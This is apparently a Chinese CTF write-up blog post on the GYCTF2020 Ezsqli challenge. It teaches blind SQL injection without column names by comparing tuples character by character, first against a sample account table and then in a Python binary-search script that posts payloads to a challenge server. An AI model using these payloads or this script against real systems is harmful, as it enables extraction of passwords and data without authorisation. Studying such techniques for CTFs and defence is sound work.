无列名注入_2

在之前,我们使用了select `1` from (select 1,2 union select * from tableX)a这样一个形式来进行无列名注入,原理可以看我之前写的(抄的)一篇https://www.cnblogs.com/AikN/p/15725756.html

在这个形式被过滤了以后,我们还可以使用另一种方式尝试注入。

基本原理

其实也很简单

sql查询语句 返回结果
(select "b") > (select "a") 1
(select "abce") > (select "abcd") 1
(select "aacd") > (select "abcd") 1
(select "a") > (select "baaa") 1

即如果使用sql语句进行大小比较,会逐位比较,出现不一样的字母时即返回结果。

具体使用中,如有下表account

username passwd
Aiknr hhhaaa
Botm YouWontKnow!

我们不知道列名是什么,输入中又过滤了如union的参数,就需要用到这种无列名注入的姿势。

我们只需要逐个位数试就行了

使用payload

(select 1,"a") > (select * from account) -> 0

(select 1,"b") > (select * from account) -> 0

(select 1,"c") > (select * from account) -> 0

...

(select 1,"i") > (select * from account) -> 1

当尝试到“i”的时候,返回正确,因为“i”是第一个超过“h”的字母,即Aiknr账户的密码第一位。这个时候我们就知道了Aiknr账户第一位为“h”

随后,我们把结果拼到payload里,进行下一位的尝试

(select 1,"ha") > (select * from account) -> 0

(select 1,"hb") > (select * from account) -> 0

(select 1,"hc") > (select * from account) -> 0

...

(select 1,"hi") > (select * from account) -> 1

然后,我们就知道密码第二位为"h"了。随后用同样的方法即可以得到全部的密码

这里因为account表有两位,我们想比较的在第二个位置,所以在第二个位置放payload。至于为什么第一个位置放置1,我用题目实验后,发现数字是大于所有字母的,具体可能和php的比较机制有关,不太了解。

题目的脚本借鉴了网上的,发现大伙都是用的遍历,太慢了,还是推荐大家用二分法,平均尝试5-6次就可以得到一位结果。遍历就起飞了,ascii码是几就要遍历几次得到一位。

import requests

url = 'http://3347a09e-7c1e-41c1-b53f-c57dee0bc5c6.node4.buuoj.cn:81/index.php'

MaxLen = 250

flag = ''

for i in range(1,MaxLen):

    low = 32

    high = 128

    mid = (low + high) // 2

    while(low < high):

        hexchar = flag + chr(mid)

        payload = '0^((select 1,"%s")>(select * from f1ag_1s_h3r3_hhhhh))'%(hexchar)

        # print(payload)

        data = {'id':payload}

        r = requests.post(url=url, data=data)

        text = r.text

        if 'Nu1L' in r.text:

            high = mid

        else:

            low = mid + 1

        mid = (low + high) // 2

    if(mid == 32 or mid == 127):

        break

    flag += chr(mid - 1)

    print(flag)

最终得到flag



看着怪怪的,交上去也不对,不知道为啥。反正我应该算是做出来了(orz

无列名注入_2 [GYCTF2020]Ezsqli 1的更多相关文章

  1. [GYCTF2020]Ezsqli 无列名注入

    手工注入了几下,是数字注入,过滤了 or , union 输入1||1=1   回显Nu1L 再输入 1&&(ascii(substr(database(),1,1))>32)# ...

  2. Sql 中的as是什么意思 + 无列名注入解析

    相当于取别名 这里结合一下无列名注入的知识点: 这种方法在第十届SWPUCTF的web1——广告招租里考到了:

  3. BUUCTF-web web1 (无列名注入)

    注册并登录后发现,sql注入,注入点在广告申请的界面.加单引号发现报错 先通过insert插入数据,然后再通过id查询相应的数据,所以是二次注入. 常见报错函数updatexml,floor以及ext ...

  4. swpuCTF2019 web1 无列名注入

    上周参加的swpuctf比赛第一道web题做了好久,在最后一个小时用非预期的方法做出来了,看了官方题解之后记录一下wp里面的无列名注入. 关于无列名注入可以看一下这篇链接 https://www.ch ...

  5. mysql无列名注入

    0x00 原理   mysql无列名注入是报错注入的一个变种,前提是已知表名,但是不知道列名,或者只知道部分列名,可通过报错注入拼接查询自身表,当自表被拼接时,由于存在重复属性列,会将列信息报错返回, ...

  6. 小议webpack下的AOP式无侵入注入

    说起来, 面向切面编程(AOP)自从诞生之日起,一直都是计算机科学领域十分热门的话题,但是很奇怪的是,在前端圈子里,探讨AOP的文章似乎并不是多,而且多数拘泥在给出理论,然后实现个片段的定式)难免陷入 ...

  7. iBatis查询时报"列名无效"或"找不到栏位名称"无列名的错误原因及解决方法

    iBatis会自动缓存每条查询语句的列名映射,对于动态查询字段或分页查询等queryForPage, queryForList,就可能产生"列名无效".rs.getObject(o ...

  8. [GYCTF2020]Ezsqli-1|SQL注入

    1.打开界面之后在输入框进行输入测试,分别输入1.2.3.'等字符,结果如下: 2.看到bool(false)这里我想到了bool注入,因为之前做过这道题:https://www.cnblogs.co ...

  9. Mysql注入汇总!!!!!!!!!

    师傅tpl!!!!! https://xz.aliyun.com/t/7169[对MYSQL注入相关内容及部分Trick的归类小结] https://www.jianshu.com/p/f261125 ...

  10. BUUCTF[归纳]sql注入相关题目

    这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境. [0CTF 2016]piapiapia 我尝试了几种payload,发现有两种情况. 第一种:Invalid user ...

随机推荐

  1. Zookeeper - 客户端常用命令

    查看客户端命令帮助信息 查看Zookeeper的版本 查看使用过的历史命令 查看根目录下的znode 创建znode 查看节点信息 修改znode的内容 删除znode 关闭连接 连接客户端 退出客户 ...

  2. deepseek:如何用php写微信公众号订阅回复事件

    以下是使用 PHP 重写的微信公众号订阅事件回复的示例代码.这个代码实现了用户订阅(关注)公众号时,自动回复一条欢迎消息. PHP 实现代码 <?php // 微信公众平台的Token defi ...

  3. nginx 根据 URL 参数引入不同的文件

    同步发布:https://blog.jijian.link/2020-06-30/nginx-import-file/ 编程世界中各种奇奇怪怪的需求都有,本次遇到一个需求:根据URL参数判断,包含 x ...

  4. 一次h5活动页面的踩坑 过程

    托好奇心的福,这几天又接了一个bug,哦不,一个非常锻炼个人能力的h5页面,期间涉及到很多问题,在此打算先占个坑,等日后有时间再慢慢记录,无论是swiper插件的使用,还是关于硬件加速的运用,又或者是 ...

  5. mac ping IP+端口的方法

    nc -vz -w 2 192.168.1.104 3306

  6. Windows 10右键添加 "在此处打开命令窗口" 菜单

    1.添加右键菜单的两种效果: 第一种是在 桌面/文件夹窗口中/选中文件夹上直接点击右键,显示"在此处打开命令窗口"选项,如图: 第二种是在 桌面/文件夹窗口中/选中文件夹上按住Sh ...

  7. 【Python】使用PyInstaller把代码打包成exe可执行文件

    使用PyInstaller打包自己写好的代码 零.需求 最近接到一个小单,需要批量修改文档内容,用Python做好后要打包成exe程序给客户的Win7电脑使用,此时需要用到PyInstaller打包自 ...

  8. javascript 数值交换技巧

    需求 现在存在var a = 1,b = 2;,要求使用javascript实现a & b数值的交换,让a = 2,b = 1. 中间变量(常规实现方式) var a = 1, b = 2; ...

  9. Web前端入门第 30 问:CSS 文本与字体样式常用属性

    CSS 盒模型是基石,文本和字体则是盒子内容的重要组成部分.毕竟清水房有了,软装也得跟上啊. 字体常用属性 font-family 定义字体类型(如: Arial, "Microsoft Y ...

  10. 等待元素加载出来后再执行下一步的方法(execute javascript指令的用法)

    上图,会员修改参数后,提示修改成功,弹出层会暂时冻结页面,导致"会员"菜单不可点击 除了使用sleep加等待时间的方法解决,本教程用"execute javascript ...